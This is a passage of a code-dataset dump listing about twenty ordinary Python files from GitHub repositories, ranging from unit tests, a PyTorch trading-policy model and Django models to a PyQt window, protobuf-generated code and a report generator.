max_stars_repo_path
stringlengths 4
182
| max_stars_repo_name
stringlengths 6
116
| max_stars_count
int64 0
191k
| id
stringlengths 7
7
| content
stringlengths 100
10k
| size
int64 100
10k
|
---|---|---|---|---|---|
tests/test_stock.py
|
HeavensGold/stonky
| 3 |
2022758
|
from stonky.stock import Stock
def test_post_init():
stock = Stock(ticket="amd", currency_code="usd")
assert stock.ticket == "AMD"
assert stock.currency_code == "USD"
def test_volume_str__hundreds__lower():
stock = Stock(volume=0)
assert stock.volume_str == "0.00"
def test_volume_str__hundreds__upper():
stock = Stock(volume=999.99)
assert stock.volume_str == "999.99"
def test_volume_str__thousands__lower():
stock = Stock(volume=1_000)
assert stock.volume_str == "1K"
def test_volume_str__thousands__upper():
stock = Stock(volume=999_999)
assert stock.volume_str == "999.9K"
def test_volume_str__millions__lower():
stock = Stock(volume=1_000_000)
assert stock.volume_str == "1M"
def test_volume_str__millions__upper():
stock = Stock(volume=999_999_999)
assert stock.volume_str == "999.9M"
def test_voume_str__billions__lower():
stock = Stock(volume=1_000_000_000)
assert stock.volume_str == "1B"
def test_voume_str__billions__upper():
stock = Stock(volume=999_999_999_999)
assert stock.volume_str == "999.9B"
def test_colour__red():
stock = Stock(delta_amount=-100)
assert stock.colour == "red"
def test_colour__yellow():
stock = Stock(delta_amount=0)
assert stock.colour == "yellow"
def test_colour__green():
stock = Stock(delta_amount=100)
assert stock.colour == "green"
def test_ticker_tape__down():
stock = Stock(
ticket="AMD",
delta_amount=-10.123,
delta_percent=0.156,
volume=100.123,
amount_bid=200.553,
)
assert stock.ticker_tape == "AMD 100.12 @ 200.55 ▼ -10.12 +15.60%"
def test_ticker_tape__zero():
stock = Stock(
ticket="AMD",
delta_amount=0.0,
delta_percent=0.156,
volume=100.123,
amount_bid=200.553,
)
assert stock.ticker_tape == "AMD 100.12 @ 200.55 ▬ +0.00 +15.60%"
def test_ticker_tape_up():
stock = Stock(
ticket="AMD",
delta_amount=10.123,
delta_percent=0.156,
volume=100.123,
amount_bid=200.553,
)
assert stock.ticker_tape == "AMD 100.12 @ 200.55 ▲ +10.12 +15.60%"
def test_position():
stock = Stock(ticket="AAPL", delta_amount=12.345, delta_percent=0.0678)
assert stock.position == "AAPL +12.35 +6.78%"
def test_profit_and_loss():
stock = Stock(delta_amount=12.345, delta_percent=0.0678)
assert stock.profit_and_loss == "+6.78% +12.35 USD"
| 2,493 |
misc/RL/model.py
|
deecamp-chuangxin/DeepInvest
| 1 |
2023761
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class DRL(nn.Module):
# Direct Reinforcement model to learn trading policy
# Using shallow rnn to get policy
def __init__(self,config):
super(DRL,self).__init__()
self.lr = 0.001 #原学习率0.00001感觉太低了,换成0.001
self.epoch = 5
self.more_train = False
self.load_model = 'DDR30_4'
self.save_model = 'DDR30'
self.objective_type = 'TP'
self.model_type = 'MLP'
self.MLP_layer = 2
self.noise_level = 2
self.truncate_step = 5
self.lamda = 0.01
self.cost_rate = 0.0003 #港股交易手续费高达0.31%-0.36%。。。
self.input_size = 45
self.hidden_size = 30
if self.model_type == 'RNN':
#self.RNN_cell = nn.RNNCell(self.input_size+5,self.hidden_size)
self.GRU_cell = nn.GRUCell(self.input_size+5,self.hidden_size)
self.RNN_Linear = nn.Linear(self.hidden_size,1)
else:
if self.MLP_layer == 1:
self.MLPOnly = nn.Linear(self.input_size+5,1)
else:
self.MLP_Linear1 = nn.Linear(self.input_size+5,self.hidden_size)
self.MLP_Linear2 = nn.Linear(self.hidden_size,1)
#self.Policy_u = nn.Linear(1,1,bias=False)
self.Policy_u = nn.Parameter(torch.rand(1))
self.optimizer = optim.Adam(self.parameters(),lr=self.lr) #self.parameters()来自父类;lr是学习率
for param in self.parameters():
print(param.data.shape)
def GetPolicy_RNN(self,Rt,Ht_1,Ft_1):
# Does not explicitly using Ft_1
# Using Hidden state Ht_1 instead
Ft_1 = Variable(Ft_1).cuda()
Policy_bias = self.trading_reg * Ft_1
input_t = Rt.unsqueeze(0)
Ht = self.GRU_cell(input_t,Ht_1)
H = F.tanh(self.RNN_Linear(Ht).squeeze()+Policy_bias)
#H = F.tanh(self.RNN_Linear(Ht).squeeze())
value = H.data[0]
# Short position
if value <= -0.25:
strategy = -1
# Long position
elif value >= 0.25:
strategy = 1
# Neutral
else:
strategy = 0
diff = value - strategy
Ft = H - diff
return Ft, Ht
def GetPolicy_MLP(self,Ft_1,Rt,noise):
# Rt [Rt_m,...,Rt_1]
if self.MLP_layer ==1:
H = self.MLPOnly(Rt)
else:
H1 = F.sigmoid(self.MLP_Linear1(Rt))
H = self.MLP_Linear2(H1)
#Policy_bias = self.trading_reg * Ft_1
Policy_bias = self.Policy_u*Ft_1
out = F.tanh(H+Policy_bias)
value = out.data[0]
# Short position
if value <= -0.25:
strategy = -1
# Long position
elif value >= 0.25:
strategy = 1
# Neutral
else:
strategy = 0
diff = value - strategy
Ft = out - diff
return Ft
def CheckStateChange(self,policies):
Ft_1, Ft = policies
if Ft_1.data[0] == Ft.data[0]:
return 0
else:
return 1
def GetCostAmount(self,policies):
Ft_1, Ft = policies
amount = torch.abs(Ft-Ft_1)
#print(Ft.data[0],Ft_1.data[0],amount.data[0])
return amount
def GetPriceChange(self,price_data):
Pt = price_data[1:]
Pt_1 = price_data[:-1]
revenue = Pt - Pt_1
return revenue
def GetMomentum(self,price_data,momentum_days):
Pt = price_data[-1]
Momentum = []
for avg in momentum_days:
Momentum.append(Pt-avg)
Momentum.append(Pt-price_data[0])
return torch.FloatTensor(Momentum)
def GetSharpeRatio(self,Rt,At_1,Bt_1):
#print(Rt.data[0],At_1.data[0],Bt_1.data[0])
At = At_1 + self.lamda * (Rt - At_1)
Bt = Bt_1 + self.lamda * (Rt**2 - Bt_1)
first_term = Bt_1 * (Rt-At_1)
second_term = (At_1 * (Rt**2 - Bt_1)) / 2
numerator = (Bt_1 - At_1**2) ** (3/2)
if numerator.data[0] != 0:
Dt = (first_term - second_term) / numerator
else:
Dt = Variable(torch.zeros(1)).cuda()
#devDt = (Bt_1 - At_1*Rt) / (Bt_1 - At_1**2)**(3/2)
return Dt, Variable(At.data).cuda(), Variable(Bt.data).cuda()
| 4,557 |
MainWin1.py
|
zhuxuanhe/Qt5uid
| 2 |
2022628
|
import sys
from PyQt5.QtWidgets import QMainWindow,QApplication,QDesktopWidget
from PyQt5.QtGui import QIcon
class FirstMainWin(QMainWindow):
def __init__(self,parent=None):
super(FirstMainWin,self).__init__(parent)
#set title
self.setWindowTitle('标题')
self.resize(400,300)
self.status = self.statusBar()
self.status.showMessage('xiaoxi',5000)
self.center()
def center(self):
screen = QDesktopWidget().screenGeometry()
size = self.geometry()
newLeft = int((screen.width()-size.width())/2)
newTop = int((screen.height()-size.height())/2)
self.move(newLeft,newTop)
if __name__ == '__main__':
app = QApplication(sys.argv)
app.setWindowIcon(QIcon('./img/favicon.ico'))
main = FirstMainWin()
main.show()
sys.exit(app.exec_())
| 863 |
Codewars/Test/Greet_me_test.py
|
maxcohen31/A-bored-math-student
| 0 |
2023219
|
import unittest
from Greet_me_7_kyu import greet
class Greet(unittest.TestCase):
def test_1(self):
data_test = (
['VALERIE', 'Hello Valerie!'],
['krissy', 'Hello Krissy!'],
['Brian', 'Hello Brian!']
)
for data, result in data_test:
self.assertEqual(greet(data), result)
if __name__ == "__main__":
unittest.main()
| 469 |
gchatautorespond/lib/chatworker/testworker.py
|
merrlyne/gchatautorespond
| 0 |
2023048
|
import httplib
import logging
from flask import Flask
import httplib2
from oauth2client.client import AccessTokenRefreshError
from .bot import MessageBot
logger = logging.getLogger(__name__)
app = Flask(__name__)
@app.route('/message/<email>', methods=['POST'])
def message(email):
app.config['worker'].send_to(email)
return ('', httplib.NO_CONTENT)
class TestWorker(object):
"""A TestWorker runs a bot that can send messages to other bots."""
message = ('Hello! This is your Autoresponder test message.'
'\nIf you did not request one, email <EMAIL> for help.')
def __init__(self, raw_credentials):
self.raw_credentials = raw_credentials
def start(self):
self.bot = MessageBot(self.raw_credentials.id_token['email'], self.raw_credentials.access_token)
failed_auth_callback = self._bot_failed_auth
self.bot.add_event_handler('failed_auth', failed_auth_callback)
self.bot.connect()
self.bot.process(block=False)
def stop(self):
self.bot.disconnect(wait=False, send_close=False)
def send_to(self, address):
logger.info("sending to %r", address)
self.bot.send_to(address, self.message)
def _bot_failed_auth(self, event):
"""Handle two cases:
* expired auth -> attempt to refresh
* revoked auth -> remove the credentials
"""
self.stop()
try:
logger.info("refreshing test bot credentials")
self.raw_credentials.refresh(httplib2.Http())
except AccessTokenRefreshError:
logger.error("test bot credentials revoked?")
else:
logger.info("test bot credentials refreshed")
self.start()
| 1,738 |
helpers/init_console.py
|
codegods/blo
| 7 |
2023718
|
import os
import sys
from platform import system
PROJECT_ROOT = os.path.abspath(
".."
if os.path.abspath(".").split("/")[-1]
in ["lib", "api", "helpers", "scripts", "tests", "extensions", "docs", "frontend"]
else "."
)
def _win_init() -> None:
"""
Imports and initialises the ANSI(32|64).dll depending upon the
system kind. Also frees the dll when exiting.
"""
import ctypes
from ctypes import wintypes
import atexit
kernel32 = ctypes.windll.kernel32
kernel32.FreeLibrary.argtypes = (wintypes.HANDLE,)
kernel32.FreeLibrary.restype = wintypes.BOOL
# Checks if system is 32bit or 64bit
path_to_dll = os.path.join(PROJECT_ROOT, "helpers", "ANSI32.dll")
if sys.maxsize > 2 ^ 31:
path_to_dll = os.path.join(PROJECT_ROOT, "helpers", "ANSI64.dll")
# Loads the dll
dll = ctypes.WinDLL(path_to_dll, use_last_error=True)
def _win_exit():
"""Frees the dll"""
if not kernel32.FreeLibrary(dll._handle):
raise ctypes.WinError(ctypes.get_last_error())
atexit.register(_win_exit)
def init() -> None:
"""
Initialises the ANSICON dll on windows systems and
does absolutely nothing on other platforms.
It helps us use ANSI sequences without any external libraries.
"""
if system().lower() == "windows":
_win_init()
| 1,407 |
tests/conftest.py
|
skriems/cherrypy-recipes
| 0 |
2023377
|
import pytest
from db.server import start_postgres
@pytest.fixture(scope='session', autouse=True)
def pg_instance():
instance = None
try:
instance = start_postgres()
yield instance
except Exception as err:
pytest.skip("Postgres not available ({err})".format(**locals()))
if instance:
instance.destroy()
| 353 |
affinity_search/outputsql.py
|
RMeli/gninascripts
| 18 |
2023817
|
#!/usr/bin/env python
'''
Output the parameters that makemodel supports with their ranges
'''
import makemodel
import json, sys
from collections import OrderedDict
#extract from arguments to makemodel
opts = makemodel.getoptions()
create = 'CREATE TABLE params (rmse DOUBLE, top DOUBLE, R DOUBLE, auc DOUBLE'
#everything else make a string
for (name,vals) in sorted(opts.items()):
create += ', %s VARCHAR(32)' % name
create += ');'
print(create)
| 454 |
backend/quality_report.py
|
ICTU/quality-report
| 25 |
2024478
|
#!/usr/bin/env python
"""
Copyright 2012-2019 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python script to retrieve metrics from different back-end systems, like Sonar and Jenkins.
import logging
import pathlib
import sys
from typing import cast
import pygal
import pkg_resources
from hqlib import app, formatting, commandlineargs, report, metric_source, log, filesystem, configuration, \
NAME, VERSION
class Reporter(): # pylint: disable=too-few-public-methods
""" Class for creating the quality report for a specific project. """
def __init__(self, project_folder_or_filename):
self.__project = configuration.project(project_folder_or_filename)
def create_report(self, report_folder, create_frontend: bool = True):
""" Create, format, and write the quality report. """
quality_report = report.QualityReport(self.__project)
for history in self.__project.metric_sources(metric_source.History):
history = cast(metric_source.History, history)
if history.filename():
history.add_report(quality_report)
self.__create_report(quality_report, report_folder, create_frontend)
return quality_report
@classmethod
def __create_report(cls, quality_report, report_dir, create_resources: bool = True):
""" Format the quality report to HTML and write the files in the report folder. """
report_dir = pathlib.Path(report_dir or '.').resolve()
filesystem.create_dir(report_dir)
filesystem.create_dir(report_dir / 'json')
if create_resources:
cls.__create_resources(report_dir)
json_files = dict(metrics=formatting.MetricsFormatter,
meta_history=formatting.MetaMetricsHistoryFormatter,
meta_data=formatting.MetaDataJSONFormatter)
for filename, formatter in json_files.items():
cls.__create_json_file(quality_report, report_dir, formatter, filename)
cls.__create_trend_images(quality_report, report_dir)
@classmethod
def __create_json_file(cls, quality_report, report_dir, formatter, filename):
""" Create the JSON file using the JSON formatter specified. """
json_filename = report_dir / 'json' / '{0}.json'.format(filename)
cls.__format_and_write_report(quality_report, formatter, json_filename, 'w', 'utf-8')
@staticmethod
def __create_resources(report_dir):
""" Create and write the resources. """
resource_manager = pkg_resources.ResourceManager()
resource_module = app.__name__
for resource_type, encoding in (('img', None), ('dist', None), ('html', 'utf-8')):
resource_dir = (report_dir / resource_type) if resource_type != 'html' else report_dir
filesystem.create_dir(resource_dir)
for resource in resource_manager.resource_listdir(resource_module, resource_type):
filename = resource_dir / resource
contents = resource_manager.resource_string(resource_module, resource_type + '/' + resource)
mode = 'w' if encoding else 'wb'
contents = contents.decode(encoding) if encoding else contents
filesystem.write_file(contents, filename, mode, encoding)
@classmethod
def __create_trend_images(cls, quality_report, report_dir):
""" Retrieve and write the trend images. """
style = pygal.style.Style(background='transparent', plot_background='transparent')
dates = ''
filesystem.create_dir(report_dir / 'chart')
for metric in quality_report.metrics():
line_chart = pygal.Line(style=style, range=metric.y_axis_range())
line_chart.add('', metric.recent_history(), stroke_style={'width': 2})
image = line_chart.render_sparkline()
filename = report_dir / 'chart' / '{0!s}.svg'.format(metric.id_string())
filesystem.write_file(image, filename, mode='wb', encoding=None)
cls.__save_metric_long_history(metric, report_dir)
if not dates:
dates = metric.get_long_history_dates()
filename = report_dir / 'json' / 'dates.txt'
filesystem.write_file(dates, filename, mode='w', encoding=None)
@classmethod
def __save_metric_long_history(cls, metric, report_dir):
filename = report_dir / 'json' / '{stable_id}.txt'.format(stable_id=metric.normalized_stable_id())
filesystem.write_file(",".join(str(i) if i is not None else '' for i in metric.long_history()),
filename, mode='w', encoding=None)
@staticmethod
def __format_and_write_report(quality_report, report_formatter, filename, mode, encoding, **kwargs):
""" Format the report using the formatter and write it to the specified file. """
formatted_report = report_formatter(**kwargs).process(quality_report)
filesystem.write_file(formatted_report, filename, mode, encoding)
if __name__ == '__main__':
# pylint: disable=invalid-name
args = commandlineargs.parse()
log.init_logging(args.log)
logging.info("%s v%s starting quality report", NAME, VERSION)
report = Reporter(args.project).create_report(args.report, args.frontend != 'no')
logging.info("%s v%s done with quality report", NAME, VERSION)
sys.exit(2 if args.failure_exit_code and report.direct_action_needed() else 0)
| 5,925 |
google_maps_reviews/utils.py
|
outscraper/google-maps-reviews
| 2 |
2023867
|
def as_list(value):
if isinstance(value, list):
return value
else:
return [value]
| 106 |
pyflu/encoding.py
|
flupke/pyflu
| 1 |
2022939
|
"""
Charset encoding utilities.
"""
import sys
def to_fs_encoding(value):
"""
Convert an unicode value to a str in the filesystem encoding.
"""
if not isinstance(value, unicode):
raise TypeError("expected a unicode value")
return value.encode(sys.getfilesystemencoding())
def from_fs_encoding(value):
"""
Convert a str value to an unicode object from the filesystem encoding.
"""
if not isinstance(value, str):
raise TypeError("expected a str value")
return value.decode(sys.getfilesystemencoding())
| 561 |
toolManager.py
|
benjamincongdon/adept
| 14 |
2023890
|
class ToolManager(object):
# DEFINE CONSTANTS
# ONLY ONE FUNC STATE CAN BE SELECTED AT A TIME
FUNC_FILL = 1
FUNC_SELECT = 2
# ONLY ONE EFFECT STATE CAN BE SELECTED AT A TIME
EFFECT_DRAW = 1
EFFECT_AREA = 2
func_state = None
effect_state = None
@staticmethod
def verify_state(func_state, effect_state):
assert(
func_state == ToolManager.FUNC_FILL or \
func_state == ToolManager.FUNC_SELECT
)
assert(
effect_state == ToolManager.EFFECT_DRAW or \
effect_state == ToolManager.EFFECT_AREA
)
@staticmethod
def set_func_state(other_state):
ToolManager.verify_state(other_state, ToolManager.effect_state)
ToolManager.func_state = other_state
if ToolManager.func_state == ToolManager.FUNC_FILL:
ToolManager.BUTTON_FUNC_FILL.bg_color = ToolManager.BUTTON_FUNC_FILL_SEL_COLOR
ToolManager.BUTTON_FUNC_FILL.render()
ToolManager.BUTTON_FUNC_SELECT.bg_color = ToolManager.BUTTON_FUNC_SELECT_BG_COLOR
ToolManager.BUTTON_FUNC_SELECT.render()
elif ToolManager.func_state == ToolManager.FUNC_SELECT:
ToolManager.BUTTON_FUNC_SELECT.bg_color = ToolManager.BUTTON_FUNC_SELECT_SEL_COLOR
ToolManager.BUTTON_FUNC_SELECT.render()
ToolManager.BUTTON_FUNC_FILL.bg_color = ToolManager.BUTTON_FUNC_FILL_BG_COLOR
ToolManager.BUTTON_FUNC_FILL.render()
@staticmethod
def set_effect_state(other_state):
ToolManager.verify_state(ToolManager.func_state, other_state)
ToolManager.effect_state = other_state
if ToolManager.effect_state == ToolManager.EFFECT_AREA:
ToolManager.BUTTON_EFFECT_AREA.bg_color = ToolManager.BUTTON_EFFECT_AREA_SEL_COLOR
ToolManager.BUTTON_EFFECT_AREA.render()
ToolManager.BUTTON_EFFECT_DRAW.bg_color = ToolManager.BUTTON_EFFECT_DRAW_BG_COLOR
ToolManager.BUTTON_EFFECT_DRAW.render()
elif ToolManager.effect_state == ToolManager.EFFECT_DRAW:
ToolManager.BUTTON_EFFECT_DRAW.bg_color = ToolManager.BUTTON_EFFECT_DRAW_SEL_COLOR
ToolManager.BUTTON_EFFECT_DRAW.render()
ToolManager.BUTTON_EFFECT_AREA.bg_color = ToolManager.BUTTON_EFFECT_AREA_BG_COLOR
ToolManager.BUTTON_EFFECT_AREA.render()
@staticmethod
def initialize_states(func_state, effect_state, buttons):
assert(type(buttons) == tuple and len(buttons) == 4)
ToolManager.BUTTON_FUNC_FILL = buttons[0]
ToolManager.BUTTON_FUNC_FILL_BG_COLOR = ToolManager.BUTTON_FUNC_FILL.bg_color
ToolManager.BUTTON_FUNC_FILL_SEL_COLOR = ToolManager.BUTTON_FUNC_FILL.sel_color
ToolManager.BUTTON_FUNC_SELECT = buttons[1]
ToolManager.BUTTON_FUNC_SELECT_BG_COLOR = ToolManager.BUTTON_FUNC_SELECT.bg_color
ToolManager.BUTTON_FUNC_SELECT_SEL_COLOR = ToolManager.BUTTON_FUNC_SELECT.sel_color
ToolManager.BUTTON_EFFECT_DRAW = buttons[2]
ToolManager.BUTTON_EFFECT_DRAW_BG_COLOR = ToolManager.BUTTON_EFFECT_DRAW.bg_color
ToolManager.BUTTON_EFFECT_DRAW_SEL_COLOR = ToolManager.BUTTON_EFFECT_DRAW.sel_color
ToolManager.BUTTON_EFFECT_AREA = buttons[3]
ToolManager.BUTTON_EFFECT_AREA_BG_COLOR = ToolManager.BUTTON_EFFECT_AREA.bg_color
ToolManager.BUTTON_EFFECT_AREA_SEL_COLOR = ToolManager.BUTTON_EFFECT_AREA.sel_color
ToolManager.verify_state(func_state, effect_state)
ToolManager.func_state = func_state
ToolManager.effect_state = effect_state
ToolManager.set_func_state(ToolManager.func_state)
ToolManager.set_effect_state(ToolManager.effect_state)
| 3,728 |
gnosis/eth/django/tests/test_forms.py
|
titandac/gnosis-py
| 64 |
2023332
|
from django.forms import forms
from django.test import TestCase
from web3 import Web3
from ..filters import EthereumAddressFieldForm, Keccak256FieldForm
class EthereumAddressForm(forms.Form):
value = EthereumAddressFieldForm()
class Keccak256Form(forms.Form):
value = Keccak256FieldForm()
class TestForms(TestCase):
def test_ethereum_address_field_form(self):
form = EthereumAddressForm(data={"value": "not a ethereum address"})
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors["value"], ["Enter a valid checksummed Ethereum Address."]
)
form = EthereumAddressForm(
data={"value": "0xbaa7df320f385318fe3409cc95db48de60dfa033"}
)
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors["value"], ["Enter a valid checksummed Ethereum Address."]
)
form = EthereumAddressForm(
data={"value": "0xbaa7df320f385318fE3409CC95Db48DE60dfA033"}
)
self.assertTrue(form.is_valid())
def test_keccak256_field_form(self):
form = Keccak256Form(data={"value": "not a hash"})
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors["value"], ['"not a hash" is not a valid keccak256 hash.']
)
form = Keccak256Form(data={"value": "0x1234"})
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors["value"], ['"0x1234" keccak256 hash should be 32 bytes.']
)
form = Keccak256Form(data={"value": Web3.keccak(text="testing").hex()})
self.assertTrue(form.is_valid())
| 1,657 |
server/pubby/apps.py
|
lod-pubby/pubby-django
| 4 |
2023255
|
from django.apps import AppConfig
from pubby.config import init_config
class PubbyConfig(AppConfig):
name = 'pubby'
def ready(self):
init_config()
| 166 |
PythonBaseDemo/classAndObjDemo/6.3/instance_access_classvar.py
|
CypHelp/TestNewWorldDemo
| 0 |
2024258
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee <EMAIL> #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
class Record:
# 定义两个类变量
item = '鼠标'
date = '2016-06-16'
def info (self):
print('info方法中: ', self.item)
print('info方法中: ', self.date)
rc = Record()
print(rc.item) # '鼠标'
print(rc.date) # '2016-06-16'
rc.info()
# 修改Record类的两个类变量
Record.item = '键盘'
Record.date = '2016-08-18'
# 调用info()方法
rc.info()
| 1,369 |
library/models.py
|
VanshKachhwal/LMS
| 0 |
2022866
|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils.timezone import now
class Book(models.Model):
book_pk = models.AutoField
book_title = models.CharField(max_length=50, default = "")
book_author = models.CharField(max_length=50, default = "")
book_publisher = models.CharField(max_length=50, default = "")
genre = models.CharField(max_length=50, default="")
availability = models.IntegerField(default=0)
times_borrowed = models.IntegerField(default =0)
summary = models.CharField(max_length=300)
isbn = models.CharField(max_length = 30)
image = models.ImageField(upload_to='images', default="")
date_added = models.DateTimeField(default = now,editable = False)
rating = models.DecimalField(default = 0, decimal_places=2, max_digits=5, editable =False)
def __str__(self):
return self.book_title
def rent(self):
self.availability-=1
self.save()
class Request(models.Model):
borrower_id = models.ForeignKey(User, on_delete = models.CASCADE)
book_id = models.ForeignKey(Book, on_delete = models.CASCADE)
Days = models.IntegerField()
renew = models.BooleanField(default = False)
def __str__(self):
return self.borrower_id.username + "--" + self.book_id.book_title + "--" + str(self.Days)
class BookComment(models.Model):
sno= models.AutoField(primary_key=True)
comment=models.TextField()
user=models.ForeignKey(User, on_delete=models.CASCADE)
book=models.ForeignKey(Book, on_delete=models.CASCADE)
parent=models.ForeignKey('self',on_delete=models.CASCADE, null=True )
timestamp= models.DateTimeField(default=now)
def __str__(self):
return self.comment[0:13] + "..." + "by" + " " + self.user.username
class BorrowedBook(models.Model):
book = models.ForeignKey(Book, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
fine = models.IntegerField(default = 0)
accepted = models.DateTimeField(auto_now_add=True)
time = models.IntegerField()
class StarRating(models.Model):
sno= models.AutoField(primary_key=True)
strating=models.IntegerField(default = 0)
user=models.ForeignKey(User, on_delete=models.CASCADE)
book=models.ForeignKey(Book, on_delete=models.CASCADE)
def __str__(self):
return str(self.strating) + "..." + self.user.username
| 2,529 |
polaq_create/squad_pl/proto/dataset_pb2.py
|
tjur/polaq_master_thesis
| 1 |
2024435
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dataset.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from stanfordnlp.protobuf import CoreNLP_pb2 as CoreNLP__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='dataset.proto',
package='',
syntax='proto2',
serialized_pb=_b('\n\rdataset.proto\x1a\rCoreNLP.proto\"8\n\x07\x41rticle\x12\r\n\x05title\x18\x01 \x02(\t\x12\x1e\n\nparagraphs\x18\x02 \x03(\x0b\x32\n.Paragraph\"_\n\tParagraph\x12\x34\n\x07\x63ontext\x18\x01 \x02(\x0b\x32#.edu.stanford.nlp.pipeline.Document\x12\x1c\n\x03qas\x18\x02 \x03(\x0b\x32\x0f.QuestionAnswer\"\xa0\x01\n\x0eQuestionAnswer\x12\n\n\x02id\x18\x01 \x02(\t\x12\x35\n\x08question\x18\x02 \x02(\x0b\x32#.edu.stanford.nlp.pipeline.Document\x12\x34\n\x07\x61nswers\x18\x03 \x03(\x0b\x32#.edu.stanford.nlp.pipeline.Document\x12\x15\n\ranswerOffsets\x18\x04 \x03(\x05')
,
dependencies=[CoreNLP__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ARTICLE = _descriptor.Descriptor(
name='Article',
full_name='Article',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='title', full_name='Article.title', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='paragraphs', full_name='Article.paragraphs', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=32,
serialized_end=88,
)
_PARAGRAPH = _descriptor.Descriptor(
name='Paragraph',
full_name='Paragraph',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='context', full_name='Paragraph.context', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='qas', full_name='Paragraph.qas', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=90,
serialized_end=185,
)
_QUESTIONANSWER = _descriptor.Descriptor(
name='QuestionAnswer',
full_name='QuestionAnswer',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='QuestionAnswer.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='question', full_name='QuestionAnswer.question', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='answers', full_name='QuestionAnswer.answers', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='answerOffsets', full_name='QuestionAnswer.answerOffsets', index=3,
number=4, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=188,
serialized_end=348,
)
_ARTICLE.fields_by_name['paragraphs'].message_type = _PARAGRAPH
_PARAGRAPH.fields_by_name['context'].message_type = CoreNLP__pb2._DOCUMENT
_PARAGRAPH.fields_by_name['qas'].message_type = _QUESTIONANSWER
_QUESTIONANSWER.fields_by_name['question'].message_type = CoreNLP__pb2._DOCUMENT
_QUESTIONANSWER.fields_by_name['answers'].message_type = CoreNLP__pb2._DOCUMENT
DESCRIPTOR.message_types_by_name['Article'] = _ARTICLE
DESCRIPTOR.message_types_by_name['Paragraph'] = _PARAGRAPH
DESCRIPTOR.message_types_by_name['QuestionAnswer'] = _QUESTIONANSWER
Article = _reflection.GeneratedProtocolMessageType('Article', (_message.Message,), dict(
DESCRIPTOR = _ARTICLE,
__module__ = 'dataset_pb2'
# @@protoc_insertion_point(class_scope:Article)
))
_sym_db.RegisterMessage(Article)
Paragraph = _reflection.GeneratedProtocolMessageType('Paragraph', (_message.Message,), dict(
DESCRIPTOR = _PARAGRAPH,
__module__ = 'dataset_pb2'
# @@protoc_insertion_point(class_scope:Paragraph)
))
_sym_db.RegisterMessage(Paragraph)
QuestionAnswer = _reflection.GeneratedProtocolMessageType('QuestionAnswer', (_message.Message,), dict(
DESCRIPTOR = _QUESTIONANSWER,
__module__ = 'dataset_pb2'
# @@protoc_insertion_point(class_scope:QuestionAnswer)
))
_sym_db.RegisterMessage(QuestionAnswer)
# @@protoc_insertion_point(module_scope)
| 6,416 |
H2H/Organisation/admin.py
|
saefty/happy2help_backend
| 0 |
2022906
|
from django.contrib import admin
# Register your models here.
from .models import Organisation
@admin.register(Organisation)
class OrganisationAdmin(admin.ModelAdmin):
